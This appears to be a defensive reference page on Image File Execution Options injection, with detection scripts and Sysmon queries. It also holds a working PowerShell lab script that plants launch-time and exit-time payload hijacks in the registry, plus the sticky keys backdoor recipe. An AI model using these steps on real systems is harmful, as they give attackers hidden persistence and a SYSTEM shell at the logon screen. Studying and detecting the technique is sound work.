Image File Execution Options Injection
Malware sets a Debugger value under an Image File Execution Options key so its payload launches whenever the targeted executable is started.
Image File Execution Options (IFEO) is a legitimate developer feature that lets engineers attach a debugger to a process the instant it launches. When CreateProcess is about to start program.exe, it first checks for an IFEO subkey named after that executable. If a Debugger value is present, Windows launches the named debugger and passes the original command line as its argument; the original program never runs unless the debugger chooses to start it.
Attackers abuse this by pointing the Debugger value at their own payload. Setting it on a frequently launched or security-relevant binary (browsers, AV consoles, or accessibility tools) gives reliable execution under the privileges of whatever triggers the original program. Because the key lives under HKLM, modifying it requires administrative rights, but it survives reboots and is rarely inspected by users.
A related variant uses the Silent Process Exit monitoring feature: a GlobalFlag value under the target's IFEO subkey switches the monitoring on, and a MonitorProcess value under the parallel SilentProcessExit key names the payload, which Windows launches when the target process exits rather than when it starts. That defeats analysts who watch only for launch-time hooks.
How it works
CreateProcess resolves the IFEO subkey by the executable's base name, not its full path, so every binary with that name on the host is affected, and reads the Debugger value:
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
Name: Debugger
Data: C:\Users\Public\payload.exe
When a user launches notepad.exe, Windows instead executes the Debugger value with the original command line appended, e.g., C:\Users\Public\payload.exe notepad.exe; Notepad only runs if the payload starts it. The Silent Process Exit variant needs two keys: a GlobalFlag in the target's IFEO subkey that turns on silent-exit monitoring, and a parallel SilentProcessExit subkey that says what to launch:
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target>.exe
Name: GlobalFlag
Data: 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT)
Key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<target>.exe
Name: ReportingMode
Data: 1 (launch the monitor process)
Name: MonitorProcess
Data: C:\Users\Public\payload.exe
A classic pairing is the sticky keys backdoor: sethc.exe or utilman.exe with Debugger = cmd.exe, which hands out a SYSTEM command prompt from the logon screen. Operators more often point at a custom binary. The targeted process name and the debugger path are the two load-bearing artifacts.
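As an added lab example (not code from this page), the following PowerShell sets up both variants against notepad.exe in a disposable VM and removes them again. The payload path C:\Users\Public\payload.exe and the choice of notepad.exe are assumptions for the lab; GlobalFlag 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT) and ReportingMode = 1 are the documented switches for Silent Process Exit monitoring. Run it elevated.

```powershell
# Added lab example, not from the original page. Payload path and target are
# assumptions; the payload must exist or CreateProcess fails for notepad.exe.
#Requires -RunAsAdministrator

$Target   = 'notepad.exe'
$Payload  = 'C:\Users\Public\payload.exe'      # assumed lab payload
$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$SpeRoot  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit'

function Set-IfeoDebugger {
    # Launch-time variant: $Debugger runs instead of $Target with the original command line appended
    param([string]$Target, [string]$Debugger)
    $key = Join-Path $IfeoRoot $Target
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name Debugger -Value $Debugger -PropertyType String -Force | Out-Null
}

function Set-SilentExitMonitor {
    # Exit-time variant: GlobalFlag under IFEO enables monitoring, SilentProcessExit names the monitor
    param([string]$Target, [string]$Monitor)
    $ifeoKey = Join-Path $IfeoRoot $Target
    $speKey  = Join-Path $SpeRoot  $Target
    New-Item -Path $ifeoKey -Force | Out-Null
    New-Item -Path $speKey  -Force | Out-Null
    # 0x200 = FLG_MONITOR_SILENT_PROCESS_EXIT. This overwrites any existing GlobalFlag; OR it in outside a lab.
    New-ItemProperty -Path $ifeoKey -Name GlobalFlag     -Value 0x200    -PropertyType DWord  -Force | Out-Null
    # ReportingMode 1 = launch the monitor process named in MonitorProcess
    New-ItemProperty -Path $speKey  -Name ReportingMode  -Value 1        -PropertyType DWord  -Force | Out-Null
    New-ItemProperty -Path $speKey  -Name MonitorProcess -Value $Monitor -PropertyType String -Force | Out-Null
}

function Remove-Hijack {
    # Delete both subkeys for the target so neither variant survives
    param([string]$Target)
    foreach ($key in (Join-Path $IfeoRoot $Target), (Join-Path $SpeRoot $Target)) {
        if (Test-Path $key) { Remove-Item -Path $key -Recurse -Force }
    }
}

# Lab run: hijack, trigger, observe with Procmon or Sysmon, then clean up
Set-IfeoDebugger -Target $Target -Debugger $Payload
Start-Process notepad.exe                                   # $Payload starts, with notepad.exe as its argument
Remove-Hijack -Target $Target

Set-SilentExitMonitor -Target $Target -Monitor $Payload
$p = Start-Process notepad.exe -PassThru
Stop-Process -Id $p.Id                                      # TerminateProcess is a silent exit; the monitor fires now
Remove-Hijack -Target $Target
```

The exit-time variant only fires for the process named in the key; a Debugger value and a MonitorProcess value can coexist on the same target, which is why Remove-Hijack clears both subkeys rather than one value.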
Detection & analysis
Static analysis:
- In a captured sample, look for the literal subkey strings Image File Execution Options (or SilentProcessExit) and the value names Debugger / MonitorProcess, plus calls to RegSetValueExW / RegCreateKeyExW. Obfuscated droppers build these as stack strings, so run FLOSS first.
- Triage a live or imaged host with Autoruns (Sysinternals): the "Image Hijacks" tab enumerates every IFEO Debugger entry and flags unsigned or unverified targets. "Hide Microsoft Entries" isolates the suspicious ones quickly.
- Offline registry forensics: parse the SOFTWARE hive with RegRipper or Registry Explorer under ...\Image File Execution Options and ...\SilentProcessExit. The subkey's last-write timestamp dates the modification. Most IFEO subkeys hold only compatibility or mitigation values, so any Debugger value at all deserves a look, and one pointing outside %SystemRoot% is suspect. A bare name such as cmd.exe resolves into System32 and passes a path check, so judge it by the target it is attached to.
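The registry triage above written out as an added PowerShell audit (example code, not from this page or from Sysinternals): it walks both key trees on the local SOFTWARE hive, resolves the executable each value points at (including bare names like cmd.exe via the PATH, as CreateProcess would), and flags entries outside %SystemRoot%, without a valid Authenticode signature, or attached to an accessibility binary. The accessibility-target list and the Suspicious heuristic are this example's assumptions.

```powershell
# Added triage example, not from the original page. The Suspicious heuristic and
# the accessibility-target list are assumptions made for this example.

$Roots = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'; Value = 'Debugger' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit';            Value = 'MonitorProcess' }
)
# Reachable from the logon screen: a Debugger on any of these is the sticky keys backdoor pattern
$AccessibilityTargets = 'sethc.exe','utilman.exe','osk.exe','magnify.exe','narrator.exe','displayswitch.exe','atbroker.exe'

function Get-ExecutableFromData {
    # Pull the program out of value data such as  "C:\x\a.exe" /arg  or  cmd.exe  and resolve it to a full path
    param([string]$Data)
    $s = $Data.Trim()
    if ($s.StartsWith('"')) {
        $end = $s.IndexOf('"', 1)
        $exe = if ($end -gt 1) { $s.Substring(1, $end - 1) } else { $s.Trim('"') }
    } else {
        $exe = ($s -split '\s+')[0]
    }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)
    if (-not [IO.Path]::IsPathRooted($exe)) {
        $cmd = Get-Command $exe -ErrorAction SilentlyContinue      # bare names resolve through PATH
        if ($cmd -and $cmd.Source) { $exe = $cmd.Source }
    }
    return $exe
}

function Get-ImageHijacks {
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root.Path)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root.Path) {
            $data = $key.GetValue($root.Value)
            if ([string]::IsNullOrWhiteSpace($data)) { continue }   # subkey exists but carries no hijack value
            $exe    = Get-ExecutableFromData $data
            $exists = Test-Path -LiteralPath $exe -PathType Leaf
            $sig    = if ($exists) { (Get-AuthenticodeSignature -LiteralPath $exe).Status } else { 'NotFound' }
            $inRoot = $exists -and $exe.StartsWith($env:SystemRoot, [StringComparison]::OrdinalIgnoreCase)
            $target = $key.PSChildName
            [PSCustomObject]@{
                Target     = $target
                ValueName  = $root.Value
                Data       = $data
                Executable = $exe
                Signature  = $sig
                Suspicious = (-not $inRoot) -or ($sig -ne 'Valid') -or ($AccessibilityTargets -contains $target)
            }
        }
    }
}

Get-ImageHijacks | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

For an imaged disk, mount the hive first (reg load HKLM\Evidence <mount>\Windows\System32\config\SOFTWARE) and point $Roots at HKLM:\Evidence\Microsoft\...; the signature and existence checks then need the executable paths re-rooted onto the mount as well, otherwise they test the analyst's own machine.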
Dynamic analysis:
- Run the sample under Procmon filtered on Operation is RegSetValue and Path contains Image File Execution Options (add a second filter for SilentProcessExit) to capture the targeted executable and debugger path as they are written.
- Sysmon Event ID 13 (RegistryEvent: Value Set) records the Debugger / MonitorProcess write together with the writing process image, provided the Sysmon configuration includes those registry paths. Sysmon Event ID 1 then shows the anomalous parent/child chain: payload.exe spawned by whatever launched the original program, with the original program's name as its first argument.
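Querying those two Sysmon events from the local log, as an added PowerShell example (not from this page or from Sysmon): Get-IfeoWriteEvents returns Event ID 13 writes to the two value names, and Get-DebuggerStyleLaunches returns Event ID 1 records whose first argument is itself an .exe, the runtime shape of a hijacked launch. It assumes Sysmon is installed with a configuration that logs those registry paths; the field names are Sysmon's own.

```powershell
# Added detection example, not from the original page. Assumes Sysmon is logging
# registry writes under the IFEO and SilentProcessExit paths.

function Get-SysmonEventData {
    # Flatten each Sysmon event's EventData into one object keyed by field name
    param([int]$Id, [datetime]$Since, [int]$MaxEvents)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = $Id; StartTime = $Since }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
      ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [PSCustomObject]$d
      }
}

function Get-IfeoWriteEvents {
    # Event ID 13: who set a Debugger or MonitorProcess value, and to what
    param([datetime]$Since = (Get-Date).AddDays(-7), [int]$MaxEvents = 2000)
    Get-SysmonEventData -Id 13 -Since $Since -MaxEvents $MaxEvents |
      Where-Object {
        $_.TargetObject -match '\\Image File Execution Options\\[^\\]+\\Debugger$' -or
        $_.TargetObject -match '\\SilentProcessExit\\[^\\]+\\MonitorProcess$'
      } |
      Select-Object UtcTime, Image, ProcessId, TargetObject, Details
}

function Get-DebuggerStyleLaunches {
    # Event ID 1 where the first argument is itself an .exe name, e.g. payload.exe notepad.exe
    param([datetime]$Since = (Get-Date).AddDays(-7), [int]$MaxEvents = 5000)
    Get-SysmonEventData -Id 1 -Since $Since -MaxEvents $MaxEvents |
      Where-Object {
        # split on whitespace that is outside double quotes, so quoted paths stay whole
        $tokens = $_.CommandLine -split '\s+(?=(?:[^"]*"[^"]*")*[^"]*$)'
        $tokens.Count -ge 2 -and ($tokens[1].Trim('"') -match '\.exe$')
      } |
      Select-Object UtcTime, ParentImage, Image, CommandLine
}

Get-IfeoWriteEvents        | Format-Table -AutoSize
Get-DebuggerStyleLaunches  | Format-Table -AutoSize
```

The Event ID 1 heuristic needs a baseline: installers and updaters legitimately pass another executable as their first argument, so treat a hit as a pivot into the Event ID 13 results and the registry audit rather than an alert on its own.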
Detection rule hint:
Alert on any write of a Debugger value under ...\Image File Execution Options\* or a MonitorProcess value under ...\SilentProcessExit\*, especially when the data is an unsigned binary outside %SystemRoot%\System32; a GlobalFlag write under an IFEO subkey is the companion indicator for the exit variant. Do not rely on the path check alone: Debugger = cmd.exe on sethc.exe or utilman.exe points at a signed System32 binary and is the classic backdoor. A process whose command line carries another executable's name as its first argument is a strong runtime indicator.